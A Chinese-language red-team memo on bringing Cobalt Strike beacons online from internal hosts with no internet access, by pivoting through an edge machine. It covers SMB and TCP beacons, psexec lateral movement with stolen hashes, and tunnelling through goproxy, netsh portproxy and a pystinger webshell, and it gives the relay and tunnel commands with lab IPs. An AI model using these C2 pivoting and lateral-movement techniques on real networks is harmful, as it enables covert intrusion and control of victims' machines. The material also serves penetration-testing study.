常见不出网情况下，上线CS的方式，作为一个备忘录。

以下截图在不同时间/环境截取，IP会有些不同

存在一台中转机器

存在一台中转机器，这台机器出网，这种是最常见的情况。

经常是拿下一台边缘机器，其有多块网卡，内网机器都不出网。这种情况下拿这个边缘机器做中转，就可以上线。

拓扑大致如下:

上线方法一： SMB Beacon

介绍

官网介绍：SMB Beacon使用命名管道通过父级Beacon进行通讯，当两个Beacons连接后，子Beacon从父Beacon获取到任务并发送。

因为连接的Beacons使用Windows命名管道进行通信，此流量封装在SMB协议中，所以SMB Beacon相对隐蔽，绕防火墙时可能发挥奇效。

使用

这种Beacon要求具有SMB Beacon的主机必须接受端口445上的连接。

派生一个SMB Beacon方法：在Listner生成SMB Beacon>目标主机>右键> spawn >选中对应的Listener>上线

或在Beacon中使用命令spawn smb（smb为我的smb listener名字）

使用插件，或自带端口扫描，扫描内网机器

转到视图，选择目标

使用psexec

选择一个hash，选择smb 监听器和对应会话

即可上线

运行成功后外部可以看到∞∞这个字符，这就是派生的SMB Beacon。

当前是连接状态，你可以Beacon上用link <ip>命令链接它或者unlink <ip>命令断开它。

这种Beacon在内网横向渗透中运用的很多。在内网环境中可以使用ipc $生成的SMB Beacon上传到目标主机执行，但是目标主机并不会直接上线的，需要我们自己用链接命令(link <ip>)去连接它。

上线方法二：中转listener(Reverse TCP Beacon)

其实和方法一是类似的

以下内容会自动配置

然后和上面方法一一样，发现内网主机且知道账号密码,psexec横向传递，选择中转listener

上线方法三：HTTP 代理

中转机器不需要上线即可

使用goproxy项目做代理，项目地址：

https://github.com/snail007/goproxy

过程：

1.上传proxy.exe到web服务器(边缘主机)，在8080端口开启http代理

C:\proxy.exe http -t tcp -p "0.0.0.0:8080" --daemon

2.用netsh命令将访问内网ip 192.168.111.131的822端口(必须为未使用的端口，否则会失败)的流量重定向到外网ip 192.168.1.88的8080端口

netsh interface portproxy add v4tov4 listenaddress=192.168.111.131 listenport=822 connectaddress=192.168.1.88 connectport=8080

3.创建listener，配置如下

4.生成stageless payload，在业务服务器上执行，成功上线

连接过程

192.168.111.236  → 192.168.111.131:822→ 192.168.1.88:8080→ C2(192.168.1.89)

上线方法四、TCP Beacon(正向)

• 正向连接
• 和SMB Beacon比较类似。也需要一个父beacon
• SMB Beacon，TCP Beacon 与 Cobalt Strike 中派生 payload 的大多数动作相兼容。除了一些 要求显式 stager 的用户驱动的攻击（比如： Attacks → Packages 、 Attacks → Web Drive-by ）。

测试：

生成一个tcp beacon

使用该beacon生成一个stageless形式的木马：

上传到目标机器运行：

在中转机器的Beacon里使用connect [ip address] [port]命令进行正向连接，即可上线：

要销毁一个 Beacon 链接，在父会话或子会话的控制台中使用 unlink [ip address] [session PID] 。以后，你可以从同一主机（或其他主机）重新连接到 TCP Beacon。

上线方法五、使用pystinger进行代理转发

pystinger的详细使用 见下面章节。 这里仅简单演示一下：

一般不会将pystinger用在这种场景下

测试环境：

攻击机kali：192.168.1.35

web服务器：192.168.1.70、192.168.111.129

业务服务器：192.168.111.236

过程：

1.上传proxy.php到WEB服务器网站目录，正常访问返回UTF-8

web服务器外网ip为192.168.1.70

上传stinger_server.exe，执行

start stinger_server.exe 0.0.0.0

攻击机(192.168.1.89)上执行

./stinger_client -w http://192.168.1.70/proxy.php -l 127.0.0.1 -p 60000

此时已经将web服务器的60020端口转发到vps的60020端口上了

CS设置监听,HTTP Hosts为中转机器的内网ip，端口为60020：

使用psexec横向移动，选择listener为pystinger，或者直接生成payload在业务主机执行，业务内网主机192.168.111.236即可成功上线：